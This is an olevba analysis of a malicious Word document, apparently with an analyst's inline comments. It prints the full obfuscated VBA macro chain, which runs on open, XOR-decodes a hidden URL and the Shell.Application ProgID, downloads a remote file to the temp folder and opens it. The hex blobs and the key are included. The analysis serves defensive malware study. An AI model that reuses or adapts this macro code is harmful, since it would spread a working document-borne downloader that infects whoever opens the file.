- olevba 0.25 - http://decalage.info/python/oletools
- Flags Filename
- ----------- -----------------------------------------------------------------
- OLE:MASIHB- 204-23~1.doc
- (Flags: OpX=OpenXML, XML=Word2003XML, M=Macros, A=Auto-executable, S=Suspicious keywords, I=IOCs, H=Hex strings, B=Base64 strings, D=Dridex strings, ?=Unknown)
- ===============================================================================
- FILE: 204-23~1.doc
- Type: OLE
- -------------------------------------------------------------------------------
- VBA MACRO ThisDocument.cls
- in file: 204-23~1.doc - OLE stream: u'Macros/VBA/ThisDocument'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- Sub RAMIRO(FELIX As Long) ' Trampoline: FELIX is never read; the only action is the call to BRADY (module CLAY).
- BRADY
- End Sub
- Sub autoopen() ' Auto-exec entry point: olevba flags AutoOpen as running when the Word document is opened.
- RAMIRO (124) ' Starts the chain autoopen -> RAMIRO -> BRADY; the value 124 is not used by RAMIRO.
- End Sub
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ANALYSIS:
- +----------+----------+---------------------------------------+
- | Type | Keyword | Description |
- +----------+----------+---------------------------------------+
- | AutoExec | AutoOpen | Runs when the Word document is opened |
- +----------+----------+---------------------------------------+
- -------------------------------------------------------------------------------
- VBA MACRO PERCY.bas
- in file: 204-23~1.doc - OLE stream: u'Macros/VBA/PERCY'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- #If VBA7 And Win64 Then
- Public Declare PtrSafe Function MICKEY Lib "wininet.dll" Alias "InternetCloseHandle" (ByRef DYLAN As LongPtr) As Long ' 64-bit (PtrSafe) WinINet imports under meaningless names; the 32-bit versions are declared in module LAMAR.
- Public Declare PtrSafe Function CHASE Lib "wininet.dll" Alias "InternetOpenA" (ByVal MOISES As String, ByVal DAMIAN As Long, ByVal REUBEN As String, ByVal DESMONDTOPHER As String, ByVal DANIEL As Long) As LongPtr
- Public Declare PtrSafe Function MARCEL Lib "wininet.dll" Alias "InternetReadFile" (ByVal AUGUST As LongPtr, ByVal DARIUS As String, ByVal DONALD As Long, GEORGE As Long) As Integer
- Public Declare PtrSafe Function CLEVELAND Lib "wininet.dll" Alias "InternetOpenUrlA" (ByVal KENNETH As LongPtr, ByVal AGUSTINN As String, ByVal EDWARD As String, ByVal BRIAN As Long, ByVal RONALD As Long, ByVal ANTHONY As Long) As LongPtr
- #End If
- Public Function RICARDO(ByRef OLIVER As Object, ByRef HUGO As String, RUBEN As Double) As Boolean ' Launch step of the chain: RUBEN is unused and the function never assigns its own return value.
- Set TOMAS = CreateObject _
- (MURRAY _
- (ESTEBAN, BUDDY))
- Dim BRETT As Integer ' The CreateObject argument above is the BUDDY blob XOR-decoded with key ESTEBAN; decoded by hand it is the ProgID "Shell.Application".
- BRETT = TOMAS.Open(OLIVER & HUGO) ' Opens the path OLIVER & HUGO through that COM object; ORVILLE passes the same folder and file name it gave NOLAN as the download target.
- End Function
- Public Function GILBERTO(ByRef MONTE As String, ByRef DARWIN As Long) As Integer ' Returns the character code of one key character of MONTE, selected by DARWIN.
- GILBERTO = Asc(WOODROW(44, MONTE, _
- ((DARWIN Mod SALVATORE(MONTE)) + 1), 1)) ' SALVATORE is Len and WOODROW is Mid$, so this is Asc(Mid$(MONTE, (DARWIN Mod Len(MONTE)) + 1, 1)); the 44 does not affect the result.
- End Function
- Public Function LIONEL(FREDDIE As Long, TERRENCE As String, ENRIQUE As String) As String ' Wrapper around the string decoder MURRAY (module CLAY).
- FREDDIE = FREDDIE * 2 ' Filler: FREDDIE plays no part in the returned string.
- LIONEL = MURRAY(TERRENCE, ENRIQUE) ' TERRENCE is the key, ENRIQUE the hex blob.
- End Function
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ANALYSIS:
- +------------+----------------+-----------------------------------------+
- | Type | Keyword | Description |
- +------------+----------------+-----------------------------------------+
- | Suspicious | CreateObject | May create an OLE object |
- | Suspicious | Lib | May run code from a DLL |
- | Suspicious | Open | May open a file |
- | Suspicious | Base64 Strings | Base64-encoded strings were detected, |
- | | | may be used to obfuscate strings |
- | | | (option --decode to see all) |
- | IOC | wininet.dll | Executable file name |
- +------------+----------------+-----------------------------------------+
- -------------------------------------------------------------------------------
- VBA MACRO CLAY.bas
- in file: 204-23~1.doc - OLE stream: u'Macros/VBA/CLAY'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- Public Function MURRAY(MONTE As String, ELLIOT As String) As String ' String decoder: MONTE is the key, ELLIOT a hex-encoded blob; returns the XOR-decoded text.
- Dim JOAQUIN As Integer
- Dim HARLAN As Integer
- Dim DARREL As Integer
- DARREL = 351
- If DARREL > DARREL * 3 Then End ' Never true (351 > 1053 is false): filler that does not affect decoding.
- Dim DARWIN As Long
- Dim AGUSTIN As String
- For DARWIN = 1 To (SALVATORE(ELLIOT) / 2) ' SALVATORE is Len, so this is one iteration per encoded byte (two hex digits each).
- JOAQUIN = DESMOND(ELLIOT, DARWIN) ' Numeric value of the DARWIN-th hex pair of the blob.
- HARLAN = GILBERTO(MONTE, DARWIN) ' Key character code at index (DARWIN Mod Len(MONTE)) + 1, so the first byte is paired with the key's second character.
- AGUSTIN = AGUSTIN + DAMIEN(JOAQUIN, HARLAN) ' DAMIEN returns Chr(JOAQUIN Xor HARLAN): one decoded character per pass.
- Next DARWIN
- MURRAY = AGUSTIN
- End Function
- Public Sub BRADY() ' Second hop of the AutoOpen chain (autoopen -> RAMIRO -> BRADY -> DOMINGO).
- Dim BERT As Double ' Declared but never used.
- Dim BURTON As Integer
- For BURTON = 4 To 54 ' Counter-only loop: nothing else reads BURTON.
- BURTON = BURTON + 30
- Next BURTON
- DOMINGO (4.43) ' Continues in module CORNELIUS; DOMINGO does not read the argument.
- End Sub
- Public Function SCOTTY(SANTIAGO As String) ' SANTIAGO is never read; the only statement with an effect is the call to ELIAS.
- Dim ALONZO As String
- ALONZO = "JAMAL" ' ALONZO is assembled but never used afterwards.
- ELIAS 33 + 0.2 ' Hands control to ELIAS (module ROLANDO), which calls ORVILLE, the download-and-open routine.
- ALONZO = ALONZO + "DEVON"
- End Function
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ANALYSIS:
- No suspicious keyword or IOC found.
- -------------------------------------------------------------------------------
- VBA MACRO ROLANDO.bas
- in file: 204-23~1.doc - OLE stream: u'Macros/VBA/ROLANDO'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- Public Function NOLAN(CAREY As Long, ByVal QUINTON As String) As Boolean ' Download step: reads a remote resource through the WinINet imports and writes it to the path QUINTON. CAREY is unused. True only if data was collected.
- #If VBA7 And Win64 Then
- Dim BRAIN As LongPtr, ELWOOD As LongPtr
- #Else
- Dim BRAIN As Long, ELWOOD As Long
- #End If
- Dim KENDRICK As Long
- Dim DARIUS As String * ELLIOTT, MOISES As String ' DARIUS is a fixed-length read buffer of ELLIOTT (5555) characters; MOISES accumulates everything read.
- Dim RAPHAEL As Integer, FIDEL As Double
- BRAIN = EFRAIN ' EFRAIN (module LAMAR) calls the InternetOpenA import and returns the session handle.
- If BRAIN = 0 Then ' No session handle: return before any read or file write.
- Exit Function
- End If
- Dim THADDEUS As Boolean ' Declared but never used.
- If CLIFF(ELWOOD, BRAIN) Then ' CLIFF (module DEXTER) calls the InternetOpenUrlA import and stores the handle in ELWOOD; its Boolean result is discarded.
- End If
- If ELWOOD = 0 Then ' Opening the URL failed: nothing is written and NOLAN stays False.
- FIDEL = 0
- Else
- MARCEL ELWOOD, DARIUS, ELLIOTT, KENDRICK ' MARCEL is the InternetReadFile import; KENDRICK receives the number of bytes read.
- MOISES = DARIUS ' The first chunk is copied as the whole fixed-length buffer, not trimmed to KENDRICK.
- Dim JACKSON As Integer
- JACKSON = 0
- JACKSON = JACKSON + 33
- If JACKSON > JACKSON + 40 Then End ' Never true: filler.
- Do While KENDRICK <> 0 ' Keep reading until a read reports 0 bytes.
- MARCEL ELWOOD, DARIUS, ELLIOTT, KENDRICK
- MOISES = MOISES + Mid(DARIUS, 1, KENDRICK) ' Later chunks are trimmed to the byte count before being appended.
- Loop
- FIDEL = SALVATORE(MOISES): _
- RAPHAEL = LOWELL("JERRY") ' FIDEL is Len(MOISES); LOWELL ignores its argument and returns FreeFile.
- Open QUINTON _
- For Binary Access Write _
- Lock Write As #RAPHAEL ' Binary write to the caller-supplied path; olevba's Open/Write/Put/Binary hits come from these lines.
- Put #RAPHAEL, , MOISES ' Writes the accumulated data to disk in one call.
- JACKSON = JACKSON + 62
- If JACKSON < 0 Then End ' Never true (JACKSON is 95 here): filler.
- Close #RAPHAEL
- End If
- MICKEY ELWOOD ' MICKEY is the InternetCloseHandle import.
- MICKEY BRAIN
- MOISES = ""
- If FIDEL Then ' Non-zero length is reported as success.
- NOLAN = True
- End If
- End Function
- Public Function SALVATORE(KRISTOPHER As String) As Long ' Thin wrapper: returns Len(KRISTOPHER).
- SALVATORE = Len(KRISTOPHER)
- End Function
- Public Function ELIAS(ERNESTO As Double) ' Orchestrator: obtains an object from LAURENCE and passes it to ORVILLE; the loops and arithmetic around those calls are filler.
- Dim LIONEL As Object ' Local variable that shadows the function LIONEL inside this procedure; it is never Set here before being passed to ORVILLE.
- Dim ROMAN As Long
- For ROMAN = 14 To 15 ' Counter-only loop.
- ROMAN = ROMAN + 15
- Next ROMAN
- Dim ELLIS As Object
- For ROMAN = 10 To 20 ' Counter-only loop.
- ROMAN = ROMAN + 60
- Next ROMAN
- Set ELLIS = LAURENCE ' LAURENCE (module DEXTER) returns CreateObject of the decoded ROSCOE blob.
- ROMAN = ROMAN + 5
- Dim LEWIS As Boolean
- If ROMAN > ROMAN * 100 Then End ' Not true for the positive value ROMAN holds here: filler.
- LEWIS = ORVILLE(LIONEL, ELLIS) ' Runs the download-and-open routine in module AMOS; LEWIS is not used afterwards.
- ERNESTO = ERNESTO + 4
- End Function
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ANALYSIS:
- +------------+---------+-----------------------------------------+
- | Type | Keyword | Description |
- +------------+---------+-----------------------------------------+
- | Suspicious | Open | May open a file |
- | Suspicious | Write | May write to a file (if combined with |
- | | | Open) |
- | Suspicious | Put | May write to a file (if combined with |
- | | | Open) |
- | Suspicious | Binary | May read or write a binary file (if |
- | | | combined with Open) |
- +------------+---------+-----------------------------------------+
- -------------------------------------------------------------------------------
- VBA MACRO CORNELIUS.bas
- in file: 204-23~1.doc - OLE stream: u'Macros/VBA/CORNELIUS'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- Option Explicit
- Public Const BUDDY = "1F3E2C223B670D3C392D24305231253927" ' Hex blob, XOR-decoded by MURRAY with key ESTEBAN and passed to CreateObject in RICARDO; decoded by hand it is the ProgID "Shell.Application".
- Public Const XAVIER = "1026202B253B297F67243536" ' Hex blob decoded in ORVILLE; the result is appended to the GetSpecialFolder(2) folder to form the output file path.
- Public Const KERMIT = "24223D3E6D66633D3C23287D502A623F2561637B637F7A7463364B20" ' Hex blob decoded in CLIFF and passed as the URL argument of the InternetOpenUrlA import; recover it offline with the same XOR rather than by running the macro.
- Public Const ROSCOE = "1F353B27273D25222E6F0B3A5F201F2F3A3A3224032E23242E27" ' Hex blob decoded in LAURENCE for CreateObject; decoded by hand it is the ProgID "Scripting.FileSystemObject".
- Public Const ESTEBAN = "ELVINWILLIAMS3" ' XOR key used for all four blobs above.
- Public Const ELLIOTT = 5555 ' Read-buffer size used by NOLAN.
- Public Const WILFREDO As String = "BART" ' First argument to the InternetOpenA import in EFRAIN, i.e. the agent string of the request.
- Public Const JARROD = 1 ' Second argument to InternetOpenA (access type); 1 is INTERNET_OPEN_TYPE_DIRECT.
- Public Const VANCE = &H4000000 ' Flags argument to InternetOpenUrlA in CLIFF; &H4000000 is INTERNET_FLAG_NO_CACHE_WRITE.
- Sub DOMINGO(SANTOS As Double) ' Third hop of the AutoOpen chain; SANTOS is never read.
- SCOTTY ("ANTONSOLOMON") ' SCOTTY (module CLAY) ignores this string and calls ELIAS.
- End Sub
- Public Function DAMIEN(ByRef JOAQUIN As Integer, ByRef HARLAN As Integer) As String ' XOR primitive of the decoder: one encoded byte and one key byte in, one character out.
- DAMIEN = Chr(JOAQUIN Xor HARLAN)
- End Function
- Public Function DESMOND(ByRef ELLIOT As String, ByRef DARWIN As Long) As Integer ' Returns the numeric value of the DARWIN-th hex pair of ELLIOT.
- DESMOND = Val("&H" & (WOODROW(12, ELLIOT, ASHLEY(DARWIN), 2))) ' WOODROW is Mid$: two hex digits starting at position 2*DARWIN-1; the 12 does not affect the result.
- End Function
- Public Function ASHLEY(ByRef DARWIN As Long) As Long ' Maps a 1-based byte index to the 1-based position of its first hex digit.
- ASHLEY = (2 * DARWIN) - 1
- End Function
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ANALYSIS:
- +------------+----------------+-----------------------------------------+
- | Type | Keyword | Description |
- +------------+----------------+-----------------------------------------+
- | Suspicious | Chr | May attempt to obfuscate specific |
- | | | strings |
- | Suspicious | Xor | May attempt to obfuscate specific |
- | | | strings |
- | Suspicious | Hex Strings | Hex-encoded strings were detected, may |
- | | | be used to obfuscate strings (option |
- | | | --decode to see all) |
- | Suspicious | Base64 Strings | Base64-encoded strings were detected, |
- | | | may be used to obfuscate strings |
- | | | (option --decode to see all) |
- +------------+----------------+-----------------------------------------+
- -------------------------------------------------------------------------------
- VBA MACRO LAMAR.bas
- in file: 204-23~1.doc - OLE stream: u'Macros/VBA/LAMAR'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- Public Const JASPER = "RUSSEL" ' Not referenced by any of the modules olevba extracted from this document.
- #If VBA7 And Win64 Then
- #Else
- Public Declare Function MICKEY Lib "wininet.dll" Alias "InternetCloseHandle" (ByRef DYLAN As Long) As Long ' 32-bit counterparts of the PtrSafe WinINet imports declared in module PERCY.
- Public Declare Function CHASE Lib "wininet.dll" Alias "InternetOpenA" (ByVal MOISES As String, ByVal DAMIAN As Long, ByVal REUBEN As String, ByVal DESMONDTOPHER As String, ByVal DANIEL As Long) As Long
- Public Declare Function MARCEL Lib "wininet.dll" Alias "InternetReadFile" (ByVal AUGUST As Long, ByVal DARIUS As String, ByVal DONALD As Long, GEORGE As Long) As Integer
- Public Declare Function CLEVELAND Lib "wininet.dll" Alias "InternetOpenUrlA" (ByVal KENNETH As Long, ByVal AGUSTINN As String, ByVal EDWARD As String, ByVal BRIAN As Long, ByVal RONALD As Long, ByVal ANTHONY As Long) As Long
- #End If
- Public Function WOODROW(SAMMY As Long, ByRef KRISTOPHER As String, ByRef JOAQUIN As Integer, ByRef HARLAN As Integer) As String ' Wrapper for Mid$: returns HARLAN characters of KRISTOPHER starting at position JOAQUIN.
- WOODROW = Mid$(KRISTOPHER, JOAQUIN, HARLAN)
- SAMMY = SAMMY + 31 ' Filler: SAMMY plays no part in the returned string.
- End Function
- #If VBA7 _
- And Win64 Then
- Public Function EFRAIN() As LongPtr
- #Else
- Public Function EFRAIN() As Long
- #End If
- EFRAIN = CHASE(WILFREDO, JARROD, vbNullString, vbNullString, 0) ' CHASE is the InternetOpenA import: agent string "BART" (WILFREDO), access type 1 (JARROD), no proxy strings. The fixed agent string is a usable pivot when hunting for this request in proxy or network logs.
- End Function
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ANALYSIS:
- +------------+----------------+-----------------------------------------+
- | Type | Keyword | Description |
- +------------+----------------+-----------------------------------------+
- | Suspicious | Lib | May run code from a DLL |
- | Suspicious | Base64 Strings | Base64-encoded strings were detected, |
- | | | may be used to obfuscate strings |
- | | | (option --decode to see all) |
- | IOC | wininet.dll | Executable file name |
- +------------+----------------+-----------------------------------------+
- -------------------------------------------------------------------------------
- VBA MACRO DEXTER.bas
- in file: 204-23~1.doc - OLE stream: u'Macros/VBA/DEXTER'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- Public Function LAURENCE() As Object ' Returns a new COM object whose ProgID is hidden in the ROSCOE blob.
- Dim ISMAEL As String
- ISMAEL = MURRAY(ESTEBAN, ROSCOE) ' XOR-decodes ROSCOE with key ESTEBAN; decoded by hand it is "Scripting.FileSystemObject".
- Set LAURENCE = CreateObject(ISMAEL) ' Source of olevba's CreateObject hit for this module.
- End Function
- #If VBA7 And Win64 Then
- Public Function CLIFF(ByRef GRADY As LongPtr, NOAH As LongPtr) As Boolean
- #Else
- Public Function CLIFF(ByRef GRADY As Long, NOAH As Long) As Boolean
- #End If
- Dim PHIL As Double
- Dim GUADALUPE As String
- Dim CLARK As Long ' Declared but never used.
- GUADALUPE = LIONEL(893, ESTEBAN, KERMIT) ' Decodes the KERMIT blob with key ESTEBAN; the 893 does not affect the result.
- For PHIL = 14 To 15 ' Counter-only loop: filler.
- PHIL = PHIL + 5.5
- Next PHIL
- GRADY = CLEVELAND(NOAH, GUADALUPE, vbNullString, 0, VANCE, 0) ' CLEVELAND is the InternetOpenUrlA import: session NOAH, decoded URL, flags VANCE; the handle returns to the caller through ByRef GRADY.
- CLIFF = True ' Always True, even when the handle is 0; NOLAN tests the handle itself.
- End Function
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ANALYSIS:
- +------------+--------------+--------------------------+
- | Type | Keyword | Description |
- +------------+--------------+--------------------------+
- | Suspicious | CreateObject | May create an OLE object |
- +------------+--------------+--------------------------+
- -------------------------------------------------------------------------------
- VBA MACRO AMOS.bas
- in file: 204-23~1.doc - OLE stream: u'Macros/VBA/AMOS'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- Public Function ORVILLE(ByRef OLIVER As Object, ByRef HOMER As Object) As Boolean ' Core routine: builds a target path in a special folder, calls NOLAN to download to it, then RICARDO to open it. An Office process that fetches a file and then opens it like this is the pattern macro-blocking policy and Office child-process rules are meant to stop.
- Dim HARRISON As Long
- Set OLIVER = IGNACIO(LAURENCE) ' IGNACIO calls GetSpecialFolder(2) on the object from LAURENCE; for Scripting.FileSystemObject, 2 is TemporaryFolder.
- Dim ADOLFO
- Dim HUGO As String
- HUGO = LIONEL(4096, ESTEBAN, XAVIER) ' Decodes the XAVIER blob with key ESTEBAN (the output file name); the 4096 does not affect the result.
- For HARRISON = 2 To 5 ' Counter-only loop: filler.
- HARRISON = HARRISON * 12
- Next HARRISON
- ADOLFO = OLIVER & HUGO ' Full target path; relies on the default property of the object in OLIVER, presumably the folder path.
- If WILFRED(HOMER, ADOLFO) Then ' FileExists check whose result is discarded (empty If body).
- End If
- If NOLAN(559, ADOLFO) Then ' Download to ADOLFO; the success flag is also discarded.
- End If
- If WILFRED(HOMER, ADOLFO) Then
- End If
- ORVILLE = RICARDO(OLIVER, HUGO, 22) ' Opens the same path through the COM object RICARDO creates from the BUDDY blob.
- End Function
- Public Function WILFRED(ByRef JERMAINE As Object, ByVal FORREST As String) As Boolean ' Returns the result of JERMAINE.FileExists(FORREST) as True/False.
- If JERMAINE.FileExists(FORREST) Then
- WILFRED = True
- Else
- WILFRED = False
- End If
- End Function
- Public Function LOWELL(KRISTOPHER As String) As Integer ' Ignores KRISTOPHER and returns the next free file number.
- LOWELL = FreeFile
- End Function
- Public Function IGNACIO(ByRef NICHOLAS As Object) As Object ' Returns special folder 2 of the object passed in.
- Set IGNACIO = NICHOLAS.GetSpecialFolder(2)
- End Function
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ANALYSIS:
- No suspicious keyword or IOC found.